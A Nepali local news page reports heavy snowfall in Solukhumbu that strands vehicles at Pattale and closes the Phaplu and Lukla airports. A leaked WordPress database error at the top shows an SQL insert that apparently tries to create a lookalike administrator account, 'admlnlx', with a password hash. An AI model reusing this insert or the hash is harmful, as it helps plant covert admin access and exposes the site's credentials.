WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCZgo2EMkRrsxO2jdFooYb/pV/6Z0h.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 12:59:07', '', 'admlnlx', 'admlnlx')
गाँउले न्यूज-५ फागुन, सोलुखुम्बु । भारी हिमपातका कारण सोलुखुम्बु जिल्लाका अधिकांश हिमाली भु भागहरुका जनजीवन प्रभाबित रहेकोछ । सोलु काठमाण्डौ चल्ने गाडि जिपहरु पत्तालेमा अवरुद्ध भएको छ । हिजो बिहान् देखी निरन्तर गएराती सम्म परेको करिब् २ फिट भन्दा बढी हिउ पत्तालेमा रहेको छ । भारी हिमपात तथा चिसोका कारण सडक खुल्न समस्या परेको स्थानियले जानकारी गराउनु भएको छ । सोलु सल्लेरीवाट विहानै छुटेको ६० देखि ७० वटा जति सार्वजनिक भाडाका जिप तथा गाडिहरु र केही मोटार बाइकहरु विच वाटोमै अलपत्र रहेको छ ।
सडक बाटोमा रहेको बाक्लो हिउ पन्छाउनको लागि सोलुखुम्बुको सदरमुकाम सल्लेरिबाट स्काभेटर बोलाइको र आज बेलुका सम्ममा बाटो खुल्न सक्ने कुरा गाउँले न्युजका प्रबन्ध निर्देशक बल बहादुर राइले जानकारी गराउनु भएको छ ।
भारी हिम्पात् परेको कारण फाप्लु तथा तेन्जीङ हिलारी विमानस्थल लुक्ला पनि अवरुद्ध भएको छ ।

तस्बिर : बल बहादुर राई
भिडियोको लागि यहाँ क्लिक गर्नुस्